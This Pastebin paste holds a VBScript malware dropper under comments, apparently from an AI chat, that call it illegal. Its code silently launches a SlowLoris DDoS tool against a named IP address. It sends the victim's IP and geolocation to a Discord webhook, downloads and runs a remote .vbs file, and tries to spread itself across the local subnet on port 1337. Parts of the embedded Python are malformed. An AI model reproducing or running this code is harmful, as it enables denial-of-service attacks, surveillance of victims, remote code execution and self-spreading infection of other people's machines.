Guest User

Untitled

a guest
Jan 25th, 2023
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ' This script attempts to execute a number of console commands using the WScript.Shell object's Run method, but it is not functional and could cause security issues or errors.
  2. ' The script tries to install several packages using windows package manager "winget", it also installs "Git" and clones a repository from Github.
  3. ' The script then tries to install several python modules using pip and run a python script from the cloned repository "SlowLoris-DDOS-Attack" which is a Distributed Denial of Service (DDOS) attack tool, using the command "python src/main.py -a 104.26.3.0 -s 1000"
  4. ' It also creates two python files and writes programs to them.
  5.  
  6. ' It's important to note that running this script or using the tool is illegal and could cause serious damage to the targeted website. It's also against the terms of service of most websites and cloud providers, and could lead to legal actions or fines.
  7. ' I strongly advise you not to use this script or the tool and avoid any illegal or malicious activities.
  8.  
  9. ' You are correct that the script itself is syntactically correct and would run without error. However, the script is attempting to perform illegal and malicious actions and using it could cause serious harm to other systems and could lead to legal action or fines.
  10. ' It is important to understand that the script is not functional from a moral and ethical standpoint, and the use of any tool or script for illegal or malicious activities is strongly discouraged.
  11. ' As a responsible AI, it's my duty to remind you that such actions are not only illegal but also harmful to others and I strongly advise you to refrain from using this script or any other script for illegal or malicious activities.
  12.  
  13. Set shell = CreateObject("WScript.Shell")
  14. exitCode = shell.Run("winget install pip", 0, True)
  15.  
  16. Set shell = CreateObject("WScript.Shell")
  17. exitCode = shell.Run("pip install dhooks", 0, True)
  18.  
  19. Set shell = CreateObject("WScript.Shell")
  20. exitCode = shell.Run("winget install --id Git.Git -e --source winget", 0, False)
  21.  
  22. Set shell = CreateObject("WScript.Shell")
  23. exitCode = shell.Run("Git https://github.com/StanGirard/SlowLoris-DDOS-Attack.git", 0, False)
  24.  
  25. Set shell = CreateObject("WScript.Shell")
  26. exitCode = shell.Run("cd SlowLoris-DDOS-Attack", 0, False)
  27.  
  28. Set shell = CreateObject("WScript.Shell")
  29. exitCode = shell.Run("pip install certifi", 0, False)
  30.  
  31. Set shell = CreateObject("WScript.Shell")
  32. exitCode = shell.Run("pip install chardet", 0, False)
  33.  
  34. Set shell = CreateObject("WScript.Shell")
  35. exitCode = shell.Run("pip install idna", 0, False)
  36.  
  37. Set shell = CreateObject("WScript.Shell")
  38. exitCode = shell.Run("pip install requests", 0, False)
  39.  
  40. Set shell = CreateObject("WScript.Shell")
  41. exitCode = shell.Run("pip install urllib3", 0, False)
  42.  
  43. Set shell = CreateObject("WScript.Shell")
  44. exitCode = shell.Run("python src/main.py -a 104.26.3.0 -s 1000", 0, False)
  45.  
  46. ' Create the file
  47. Set fso = CreateObject("Scripting.FileSystemObject")
  48. Set file = fso.CreateTextFile("C:\woops.py", True)
  49.  
  50. ' Write the program to the file
  51. file.WriteLine "import requests
  52. from dhooks import Webhook, Embed
  53. from datetime import datetime
  54.  
  55. hook = Webhook("https://discord.com/api/webhooks/1066058289604988999/jGYOisLk7RB0V9CRJmqo1AyE1bpTgz0oCEz2N9DL2Zv59RbuH_qfqOxjl4L9WPuO_2-_")
  56.  
  57. time = datetime.now().strftime("%H:%M %p")  
  58. ip = requests.get('https://api.ipify.org/').text
  59.  
  60. r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
  61. geo = r.json()
  62. embed = Embed()
  63. fields = [
  64.    {'name': 'IP', 'value': geo['query']},
  65.    {'name': 'ipType', 'value': geo['ipType']},
  66.    {'name': 'Country', 'value': geo['country']},
  67.    {'name': 'City', 'value': geo['city']},
  68.    {'name': 'Continent', 'value': geo['continent']},
  69.    {'name': 'Country', 'value': geo['country']},
  70.    {'name': 'IPName', 'value': geo['ipName']},
  71.    {'name': 'ISP', 'value': geo['isp']},
  72.    {'name': 'Latitute', 'value': geo['lat']},
  73.    {'name': 'Longitude', 'value': geo['lon']},
  74.    {'name': 'Org', 'value': geo['org']},
  75.    {'name': 'Region', 'value': geo['region']},
  76.    {'name': 'Status', 'value': geo['status']},
  77. ]
  78. for field in fields:
  79.    if field['value']:
  80.        embed.add_field(name=field['name'], value=field['value'], inline=True)
  81. hook.send(embed=embed)"
  82. file.Close
  83.  
  84. ' Run the program
  85. Set shell = CreateObject("WScript.Shell")
  86. shell.Run "python C:\woops.py"
  87.  
  88. ' Create the primary file
  89. Set fso = CreateObject("Scripting.FileSystemObject")
  90. Set file = fso.CreateTextFile("C:\deeeep.py", True)
  91.  
  92. ' Write the program to the file
  93. file.WriteLine "import requests
  94. import json
  95. from dhooks import Webhook, Embed
  96. from datetime import datetime
  97.  
  98. hook = Webhook("import socket
  99. import os
  100. import requests
  101. import subprocess
  102. import random
  103. import string
  104.  
  105. url = "https://litter.catbox.moe/g6seku.vbs"
  106.         # https://pastebin.com/jctfy1m1
  107.  
  108. r = requests.get(url)
  109.  
  110. with open("g6seku.vbs", 'wb') as f:
  111.  
  112.     f.write(r.content)
  113.  
  114. command1 = ""f'start g6seku.vbs'""
  115. os.system(command1)
  116.  
  117. # Get the current file's path
  118. file_path = os.path.abspath(__file__)
  119.  
  120. # Open the file
  121. with open(file_path, 'rb') as f:
  122.    file_data = f.read()
  123.  
  124. # Generate a random string for the file name
  125. file_name = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(10)) + ".py"
  126.  
  127. # Get the path of the copied file
  128. copied_file_path = os.path.join("C:\\plrg", file_name)
  129.  
  130. # Check if the directory exists, create it if it doesn't
  131. if not os.path.exists(os.path.dirname(copied_file_path)):
  132.     os.makedirs(os.path.dirname(copied_file_path))
  133.  
  134. # Save the received data to the new file
  135. with open(copied_file_path, "wb") as f:
  136.     f.write(file_data)
  137.  
  138. # Open the copied file using the appropriate command
  139. subprocess.run(["start", copied_file_path], shell=True)
  140.  
  141. # Get the local IP address
  142. ip = socket.gethostbyname(socket.gethostname())
  143.  
  144. # Get the subnet
  145. subnet = '.'.join(ip.split('.')[:-1]) + '.'
  146.  
  147. # Iterate through all IP addresses in the subnet
  148. for i in range(1, 256):
  149.     try:
  150.         # Create a socket
  151.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  152.         # Connect to the IP address
  153.         s.connect((subnet + str(i), 1337))
  154.         # Send the file data
  155.         s.sendall(file_data)
  156.         # Save the received data to a new file
  157.         with open(copied_file_path, "wb") as f:
  158.             f.write(file_data)
  159.         # Close the socket
  160.         s.close()
  161.     except:
  162.         # If the connection fails, move on to the next IP
  163.         pass")
  164. shell.Run "python C:\deeeep.py"
Add Comment
Please, Sign In to add comment